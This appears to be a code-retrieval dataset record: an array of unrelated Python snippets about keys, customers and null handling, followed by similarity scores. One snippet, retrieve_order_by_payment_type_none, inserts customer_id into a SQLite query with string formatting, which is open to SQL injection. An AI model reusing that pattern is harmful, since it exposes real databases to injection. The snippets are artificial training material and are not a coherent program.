[ "def _key(self):\n return None", "def key(self):\n return None", "def convert_nulls(dic, null_value):\n for key in dic.iterkeys():\n if dic[key] is None:\n dic[key] = null_value", "def naics_agg_key(record: dict) -> Optional[str]:\n if record[\"naics_code\"] is None:\n return None\n return json.dumps({\"code\": record[\"naics_code\"], \"description\": record[\"naics_description\"]})", "def test_missingKey(self):\n self.assertIsNone(self.users.key(\"mystery domain\", \"mystery user\"))", "def get(self):\n return {'klant': self.customer}", "def __missing__(self, key):\n return key", "def __getitem__(self, key):\n if key.isdigit():\n customer = self.request.db.query(models.Klant).get(key)\n if customer:\n return Customer(self, key, customer=customer)\n raise KeyError", "def __init__(__self__, *,\n customer_managed_key_encryption: Optional[pulumi.Input['ClusterPropertiesCustomerManagedKeyEncryptionArgs']] = None):\n if customer_managed_key_encryption is not None:\n pulumi.set(__self__, \"customer_managed_key_encryption\", customer_managed_key_encryption)", "def get(self, key):\n return \"\"", "def test_key_no_data(self):\n key = Key({})\n\n assert key.warning is None\n assert key.in_car is None", "def _setbeneficiary_customer_no_option_59(self, val):\n self.swift_obj.BeneficiaryCustomer = val\n self.swift_obj.BeneficiaryCustomer.swiftTag = '59'", "def customer_id(self, customer_id: str):\n self._customer_id = customer_id", "def customer_email(customer):\n return customer.get(\"email\")", "def next_customer(self) -> Optional[str]:\n if len(self.priority_customer) > 0:\n return self.priority_customer.pop(0)\n elif len(self.normal_customer) > 0:\n return self.normal_customer.pop(0)\n else:\n return None", "def _remove_nulls(self, params):\n\n if params is not None:\n return {key:value for key, value in params.items() if value is not None}\n\n return {}", "def customer_id(self) -> str:\n return self._customer_id", "def keyEquivalent( self ):\n\t\treturn None", "def prepare_key(self, key):\n return smart_str(key)", "def get_key_id(self):", "def setdefault_key_value(self):\n raise NotImplementedError", "def _key(\n service=None, # type: Optional[str]\n env=None, # type: Optional[str]\n ):\n # type: (...) 
-> str\n service = service or \"\"\n env = env or \"\"\n return \"service:\" + service + \",env:\" + env", "def key(nullable=True):\n return sa.Column(\n \"key\",\n sa.Text().with_variant(mysql.VARCHAR(255), \"mysql\"),\n nullable=nullable,\n )", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def nulls_to_empty(dic, *keys):\n if not keys:\n keys = dic.keys()\n for key in keys:\n if dic[key] is None:\n dic[key] = ''\n return None", "def _country_agg_key(location_type, record: dict) -> Optional[str]:\n if record[f\"{location_type}_country_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"country_name\": record[f\"{location_type}_country_name\"],\n }\n )", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def test_neg_operate_key_is_none(self):\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n try:\n self.as_connection.operate(None, llist)\n\n except e.ParamError as exception:\n assert exception.code == -2", "def recipient_public_key(self):", "def __init__(self, cust_key):\n\n # Call the base class constructor to pass in the base URL\n super().__init__(base_url=\"https://s-platform.api.opendns.com/1.0\")\n\n # Store the API key for use as a query parameters later\n self.auth_params = {\"customerKey\": cust_key}", "def psc_agg_key(record: dict) -> Optional[str]:\n if record[\"product_or_service_code\"] is None:\n return None\n return json.dumps(\n {\"code\": record[\"product_or_service_code\"], \"description\": record[\"product_or_service_description\"]}\n )", "def test_companies_company_id_push_push_operation_key_get(self):\n pass", "def setkey(self, key, value):\n if value == \"\":\n return\n if key == \"agency_id\":\n self.agency_id = value\n elif key == \"agency_name\":\n self.agency_name = value\n elif key == \"agency_url\":\n self.agency_url = value\n elif key == \"agency_timezone\":\n self.agency_timezone = value\n elif key == \"agency_lang\":\n self.agency_lang = value\n elif key == \"agency_phone\":\n self.agency_phone = value\n elif key == \"agency_fare_url\":\n self.agency_fare_url = value\n elif key == \"agency_email\":\n self.agency_email = value\n else:\n raise InvalidKeyError(key)", "def __init__(__self__, *,\n key: pulumi.Input[str],\n user_id: Optional[pulumi.Input[int]] = None):\n pulumi.set(__self__, \"key\", key)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)", "def _get_raw_key(self, key_id):", "def customer_id(self):\n return self._customer_id", "def create_key ():", "def _validate_beneficiary_customer_no_option_59(self, val):\n return val", "def _agency_agg_key(agency_type, agency_tier, record: dict) -> Optional[str]:\n if record[f\"{agency_type}_{agency_tier}_agency_name\"] is None:\n return None\n result = {\"name\": record[f\"{agency_type}_{agency_tier}_agency_name\"]}\n if f\"{agency_type}_{agency_tier}_agency_abbreviation\" in record:\n result[\"abbreviation\"] = record[f\"{agency_type}_{agency_tier}_agency_abbreviation\"]\n if 
f\"{agency_type}_{agency_tier}_agency_code\" in record:\n result[\"code\"] = record[f\"{agency_type}_{agency_tier}_agency_code\"]\n result[\"id\"] = record[f\"{agency_type}_toptier_agency_id\"]\n return json.dumps(result)", "def store_customer(self, name):\n pass", "def __init__(__self__, *,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None):\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if key_id is not None:\n pulumi.set(__self__, \"key_id\", key_id)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)", "def customer_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"customer_gateway_id\")", "def _prepare_get_request(self, key):\n\n return {\n 'TableName': self.table_name,\n 'Key': {\n self._key_field.name: {\n self._key_field.data_type: key\n }\n }\n }", "def __init__(self, set_key=None, get_key='campaign_id'):\n self.set_key = set_key\n self.get_key = get_key", "def uuid(self, value):\n if value is not None:\n self.keystore['id'] = value\n elif 'id' in self.keystore:\n self.keystore.pop('id')", "def getEmailKey(self): \n return self.emailkey", "def transaction_recipient_agg_key(record: dict) -> str:\n if record[\"recipient_hash\"] is None or record[\"recipient_levels\"] is None:\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash_with_level\": \"\",\n }\n )\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash_with_level\": f\"{record['recipient_hash']}-{return_one_level(record['recipient_levels'])}\",\n }\n )", "def test_update_stripe_customer_id(self):\n pass", "def payload_add_customer(self, payload: dict, order: Order):\n if hasattr(order, \"lease\") and order.lease.application:\n application = order.lease.application\n payload.update(\n {\n \"email\": application.email.strip(),\n \"customer\": {\n \"firstname\": application.first_name.capitalize(),\n \"lastname\": application.last_name.capitalize(),\n \"email\": application.email.strip(),\n \"address_street\": application.address,\n \"address_zip\": application.zip_code,\n \"address_city\": application.municipality.capitalize(),\n },\n }\n )\n else:\n payload.update(\n {\n \"email\": order.customer_email.strip(),\n \"customer\": {\n \"firstname\": order.customer_first_name.capitalize()\n if order.customer_first_name\n else \"\",\n \"lastname\": order.customer_last_name.capitalize()\n if order.customer_last_name\n else \"\",\n \"email\": order.customer_email.strip(),\n \"address_street\": order.customer_address,\n \"address_zip\": order.customer_zip_code,\n \"address_city\": order.customer_city.capitalize()\n if order.customer_city\n else \"\",\n },\n }\n )", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 
'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def gen_key(self):\n\n if len(self.fields) == 0:\n return None\n\n # we do not call self.validate() here as self._id will always be null,\n # so we call self.validator.validate on the schema. This will validate\n # that 'effectiveDate', 'carrier', and 'flightNumber' are not None\n # and of valid data type\n if self.validator.validate(self.fields) == False:\n return None\n\n h = hashlib.md5()\n h.update(self.fields['effectiveDate'].isoformat())\n h.update(str(self.fields['carrier']))\n h.update(str(self.fields['flightNumber']))\n\n return h.hexdigest()", "def create_raw(self, key, value):\n data = None\n if key is not None and value is not None:\n try:\n data = self.tcex.key_value_store.create(self._context, key.strip(), value)\n except RuntimeError as e:\n self.log.error(e)\n else:\n self.log.warning('The key or value field was None.')\n return data", "async def build_key(self, attribute, value, record_id='*'):\n self.key = '{var1}:{var2}:{var3}:{var4}:{var5}'.format(var1=record_id, var2=self.industry, var3=self.merchant,\n var4=attribute, var5=value)", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def award_recipient_agg_key(record: dict) -> str:\n if record[\"recipient_hash\"] is None or record[\"recipient_levels\"] is None:\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash\": \"\",\n \"levels\": \"\",\n }\n )\n return json.dumps(\n {\n \"name\": record[\"recipient_name\"],\n \"duns\": record[\"recipient_unique_id\"],\n \"uei\": record[\"recipient_uei\"],\n \"hash\": str(record[\"recipient_hash\"]),\n \"levels\": record[\"recipient_levels\"],\n }\n )", "def update(self):\n schema = load_customer_schema(self.request)\n for key, value in schema.iteritems():\n setattr(self.customer, key, value)\n return {'klant': self.customer}", "def _county_agg_key(location_type, record: dict) -> Optional[str]:\n if record[f\"{location_type}_state_code\"] is None or record[f\"{location_type}_county_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"state_code\": record[f\"{location_type}_state_code\"],\n \"state_fips\": record[f\"{location_type}_state_fips\"],\n \"county_code\": record[f\"{location_type}_county_code\"],\n \"county_name\": record[f\"{location_type}_county_name\"],\n \"population\": record[f\"{location_type}_county_population\"],\n }\n )", "def test_add_none_field(self):\n user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def _setordering_customer_50K(self, val):\n self.swift_obj.OrderingCustomer_K = val\n self.swift_obj.OrderingCustomer_K.swiftTag = '50K'", "def _congressional_agg_key(location_type, 
record: dict) -> Optional[str]:\n if record[f\"{location_type}_state_code\"] is None or record[f\"{location_type}_congressional_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"state_code\": record[f\"{location_type}_state_code\"],\n \"state_fips\": record[f\"{location_type}_state_fips\"],\n \"congressional_code\": record[f\"{location_type}_congressional_code\"],\n \"population\": record[f\"{location_type}_congressional_population\"],\n }\n )", "def setnoempty(self, key, value):\r\n if value:\r\n self[key] = value", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def retrieve_order_by_payment_type_none(self, customer_id):\n with sqlite3.connect('bangazon.db') as conn:\n c = conn.cursor()\n c.execute(\"SELECT * FROM Orders WHERE customer_Id = '{}' AND payment_type_Id is null\".format(customer_id))\n customer_order = c.fetchall()\n return customer_order", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def __init__(__self__, *,\n key: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None):\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if value is not None:\n pulumi.set(__self__, \"value\", value)", "def filter_sent_to_customer(self, queryset, name, value):\n if str2bool(value):\n return queryset.exclude(customer=None)\n else:\n return queryset.filter(customer=None)", "def case_key(case):\n if hasattr(case, 'key'):\n return case.key\n key = str(uuid.uuid1())\n return key", "def customer_managed_key_encryption(self) -> 
Optional[pulumi.Input['ClusterPropertiesCustomerManagedKeyEncryptionArgs']]:\n return pulumi.get(self, \"customer_managed_key_encryption\")", "def customer_name(self, customer_name):\n self._customer_name = customer_name", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def stringKey(obj):\n unproxied = proxy.removeSecurityProxy(obj)\n mapper = orm.object_mapper(unproxied)\n #primary_key = mapper.primary_key_from_instance(unproxied)\n identity_values = [ getattr(unproxied, c.name) for c in mapper.primary_key ]\n identity_key = \"-\".join(map(str, identity_values))\n return \"obj-%s\" % (identity_key)", "def key_name(self) -> Optional[str]:\n return pulumi.get(self, \"key_name\")", "def get_customer_id(self):\n return self.machine_config_file_value(\"DEFAULT.CID\").strip('\"')" ]
[ "0.5777039", "0.5651661", "0.5604638", "0.548038", "0.5478544", "0.5453205", "0.5365021", "0.53444165", "0.5324741", "0.5306071", "0.5301674", "0.52935547", "0.52801406", "0.5263718", "0.52251005", "0.52210206", "0.5198161", "0.51958966", "0.5189117", "0.51726973", "0.51626706", "0.51541895", "0.51535255", "0.5126936", "0.5126936", "0.51253086", "0.5100831", "0.5095781", "0.50942975", "0.50747514", "0.5059931", "0.5059217", "0.5053175", "0.5040561", "0.50395024", "0.5034506", "0.50340796", "0.5016641", "0.5016449", "0.5015035", "0.4995279", "0.49863625", "0.4982395", "0.49741608", "0.49721995", "0.49694815", "0.49569762", "0.49556398", "0.49516675", "0.49497324", "0.49312064", "0.49090877", "0.49078837", "0.4907312", "0.49060458", "0.4905829", "0.49051657", "0.49027944", "0.49022755", "0.49000204", "0.4896455", "0.48943847", "0.48902977", "0.48767942", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48730844", "0.48680988", "0.48647967", "0.4858672", "0.48571673", "0.48546547", "0.4852732", "0.4847722", "0.48452163", "0.48442084" ]
0.0
-1
Check length of CustomerKey (len= 50)
def test_45(self): assert 'True' == Api.requestBlock('test-45')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def test_neg_list_size_with_nonexistent_key(self):\n charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'\n minLength = 5\n maxLength = 30\n length = random.randint(minLength, maxLength)\n key = ('test', 'demo', ''.join(map(lambda unused:\n random.choice(charSet),\n range(length))) + \".com\")\n try:\n self.as_connection.list_size(key, \"contact_no\")\n except e.RecordNotFound as exception:\n assert exception.code == 2", "def prepKey(key, length):\r\n keyString = \"\"\r\n while len(keyString) < length:\r\n for char in key:\r\n if len(keyString) < length:\r\n keyString += char\r\n return keyString", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def isValidKey(key):\n return True", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def _is_size_key (self, key):\n return key == '$size' or key == 'size'", "def len12(self, len): # -> None:\n ...", "def generate_key(length):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))", "def key_size(self) -> int:\n pass", "def key_size(self) -> 
int:\n pass", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def check_type( string_key ) : \r\n\r\n if type( string_key ) != type( '' ) : \r\n\r\n # raise self.__class__( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n raise Eggog( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n \r\n else :\r\n \r\n return True", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def _validate_and_split_key(self, key):\n if self._len_keys == 1:\n return self._validate_and_split_len_one(key)\n else:\n return self._validate_and_split_len(key)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def generate_key( length=10, char_set='all' ):\n\n if char_set == 'digits':\n char_list = string.digits\n elif char_set == 'letters':\n char_list = string.lowercase[:26] + string.uppercase[:26]\n else:\n char_list = good_chars\n\n char_list_limit = len( char_list ) - 1\n\n key = ''\n i = 0\n while i < length:\n key = string.join( [ key , char_list[ random.randint( 0, char_list_limit ) ] ], '' )\n i = i + 1\n\n return key", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def guess_key_length(self, min_len=1, max_len=9, display=False):\n\n res = {}\n max_ic = 0\n probable_key_length = 0\n # We try different key lengths\n for i in range(min_len, max_len+1):\n\n if self._len < i*2:\n continue\n ics = []\n for j in range(i):\n var = []\n for k in range(self._len//i):\n var.append(self._s[k*i + j])\n text = VigenereLikeCipher(''.join(var))\n ics.append(text.get_ic())\n total_ic = round(sum(ics)/len(ics),4)\n if total_ic > max_ic:\n max_ic = total_ic\n probable_key_length = i\n res[i] = total_ic\n if display:\n print \"\\n[+] Visual key length IC correspondance\"\n for k,v in res.items():\n v = int(round(v*1000,0))\n print str(k) + (int(math.floor(math.log10(len(res))))+1-len(str(k)))*\" \",\n print ''.join(['|' for i in range(v//2)])\n print \"\"\n return probable_key_length", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def _enforce_txt_record_maxlen(key, value):\n # Add 1 for '=' separator between key and value\n if len(key) + len(value) + 1 > 255:\n # 255 - 3 ('...') - 1 ('=') = 251\n return value[: 251 - len(key)] + \"...\"\n return value", "def generate_randomkey(length):\n chars = string.letters + string.digits\n return ''.join([choice(chars) for i in 
range(length)])", "def _validate_ordering_customer_50K(self, val):\n return val", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def _validate_string_min_length(self, value):\n if self.min_length is not None:\n return len(str(value)) >= self.min_length\n else:\n return True", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def checkSize(rsakey, messageSize):\n keySize = key.getKeyLength(rsakey)\n if(keySize >= messageSize):\n return True\n if(keySize < messageSize):\n return False", "def test_minmaxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'code': 'AA'}\n self.assertTrue(val.validate(document))\n\n document = {'code': 'A'}\n self.assertFalse(val.validate(document))\n\n document = {'code': 'ABC'}\n self.assertFalse(val.validate(document))", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. 
--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def hstrlen(self, key, field):\n return self._command(b'HSTRLEN', key, field)", "def size(self, key):\n return self.cli.passwords.size(key)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def _check_key(self, key):\n raise NotImplementedError", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def kem_encapsulated_key_len(self, public_key):\n result = self._lib_vscf_ecc.vscf_ecc_kem_encapsulated_key_len(self.ctx, public_key.c_impl)\n return result", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def len23(self, len): # -> None:\n ...", "def random_key(size):\n return ''.join(random.choice(string.letters) for _ in range(size))", "def check_keys(self):", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def generate_key(length, choices=None):\n if choices is None:\n choices = (\n string.ascii_lowercase +\n string.ascii_uppercase +\n string.digits\n )\n\n return ''.join(random.choice(choices) for x in xrange(length))", "def test_valid_key(self):\n f = lws.valid_data_key\n assert f('string', int, r'string') is False\n assert f('string', str, r'test') is False\n assert f(123, int, '123') is False\n assert f(123.00, float, '123') is False\n assert f('123', str, r'[0-9]*') is True", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def __len__(self):\n return self.cli.passwords.len()", "def make_random_key(length=RANDOM_KEY_LENGTH, chars=RANDOM_KEY_CHARACTERS):\n chars = [random.choice(chars) for _ in range(length)]\n return ''.join(chars)", "def get_max_key(data):\n return max(map(len, data))", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def key_length(self):\n if hasattr(self, '_m_key_length'):\n return self._m_key_length if hasattr(self, '_m_key_length') else None\n\n self._m_key_length = self.rsa_n.length_in_bits\n return self._m_key_length if hasattr(self, '_m_key_length') else None", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def test_maxlength():\n assert has_max_length(None, 2) is None\n assert has_max_length('abcd1234', 2)\n assert has_max_length('a', 2) is None", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in 
range(size)])\n return self.__strengthen_key(key)", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def str_len():\n strlen_dict = {}\n # Length of ion name\n strlen_dict['ion'] = 6\n # Length of data file name for line source\n strlen_dict['Source'] = 30\n # Return\n return strlen_dict", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, 